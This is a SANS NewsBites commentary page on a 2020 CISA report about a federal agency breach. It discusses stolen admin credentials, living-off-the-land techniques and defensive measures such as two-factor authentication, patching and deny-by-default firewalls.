Training
Featured CourseView All Courses
Get a free hour of SANS training

Experience SANS training through course previews.

Learn More
Learning Paths
FeaturedView all Focus Areas
Cloud Security Training
Can't find what you are looking for?

Let us help.

Contact us
Resources
SANS Community Benefits

Connect, learn, and share with other cybersecurity professionals

CISO Network

Engage, challenge, and network with fellow CISOs in this exclusive community of security leaders

Join the SANS Community

Become a member for instant access to our free resources.

Sign Up
For Organizations
Public Sector

Mission-focused cybersecurity training for government, defense, and education

Partnerships

Explore industry-specific programming and customized training solutions

Sponsorship Opportunities

Sponsor a SANS event or research paper

Interested in developing a training plan to fit your organization’s needs?

We're here to help.

Contact Us
Talk with an expert
Talk with an expert

NewsBites Drilldown for the Week Ending 25 September 2020

Authored bySANS Institute
SANS Institute
Newsbites.jpg

John Pescatore - SANS Director of Emerging Security Trends

DHS CISA Publishes a Detailed Incident Report Showing Living-Off-the-Land Attacks

This week’s Drilldown will focus on one item (included below) from NewsBites Issue 76, commenting on a report published by the U.S. Department of Homeland Security (DHS) Cybersecurity & Infrastructure Security Agency (CISA), which describes in detail how a government agency was penetrated and compromised.

To give away the ending: While the attackers used some advanced techniques, they had already obtained privileged administrator credentials. If you give away the combination to the safe, you have pretty much given up the crown jewels.

The attackers also took advantage of other failures of basic security hygiene. Systems weren’t patched, and the primary firewall seemed to have an Allow All policy running.

The advanced techniques are what are being called “living off the land.” Essentially, attackers are taking advantage of operating system services and other tools that system administrators frequently use and that all too often are left enabled on more systems than necessary. Not only are these very powerful services, but also by using them, attackers don’t need to import large executables. And when the tools are running, they just look like normal sys admin processes.

In the SANS Top New Attacks and Threat Report published in April 2020, Ed Skoudis described living-off-the-land techniques and listed two key mitigation requirements:

  • Careful application whitelisting--Not every system needs all admin services enabled, and not all services or tools need unlimited capabilities.
  • Purple teaming--If the red team penetration tests use living-off-the-land techniques, blue team defenders can increase their skills in detecting bad guys doing so and also hone their defensive controls.

The DHS/CISA report focused mainly on the firewall configuration deficiencies. It recommended the use of standard “deny all except what is required and approved” policies, but also listed two-factor authentication, least privilege and keeping software up-to-date.

______________________________________________________________________________

CISA: Federal Agency Hacked, Data Exfiltrated

(September 24, 2020)

The U.S. Department of Homeland Security (DHS) Cybersecurity & Infrastructure Security Agency (CISA) has published an analysis report detailing a cyberattack against a federal agency's enterprise network. The threat actor gained access to the unnamed agency's system and exfiltrated data. The report provides information about the methods used to gain access to the network. The breach was detected through EINSTEIN, CISA's intrusion detection system. The threat actor was able to gain persistent network access through reverse Socket Secure (SOCKS) proxies.

[Editor Comments]

[Pescatore] This is the first time I've seen DHS/CISA put out a detailed public report on how an attack against a government agency succeeded. This one starts off with a litany of basic security hygiene failures: The attackers started out with admin credentials; admin accounts didn't seem to require two-factor authentication for remote access; if a firewall was in place, it seemed to have allowed everything not explicitly denied policies; VPN patches were not applied; etc. The details on the steps the attackers took show a number of living-off-the-land techniques that Ed Skoudis detailed in his SANS "Most Dangerous New Attacks" keynote panel talk at this year's RSA.

[Neely] This is an excellent write-up of how the system was compromised and how the attacker adjusted to available resources to continue to penetrate and exploit the system. This also reinforces the need for two-factor authentication on internet-accessible services, especially email and remote access (e.g., VPN). Take a look at your network and make sure that not only strong authentication is required, but also that patches are applied.

Read more in:

ZDNet: CISA says a hacker breached a federal agency

www.zdnet.com/article/cisa-says-a-hacker-breached-a-federal-agency/

US-CERT CISA: Analysis Report (AR20-268A) | Federal Agency Compromised by Malicious Cyber Actor

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a

Meet the expert

SANS Institute
SANS Institute

SANS Institute

Launched in 1989 as a cooperative for information security thought leadership, it is SANS’ ongoing mission to empower cyber security professionals with the practical skills and knowledge they need to make our world a safer place.

Read more about SANS Institute
NewsBites Drilldown for the Week Ending 25 September 2020 | SANS Institute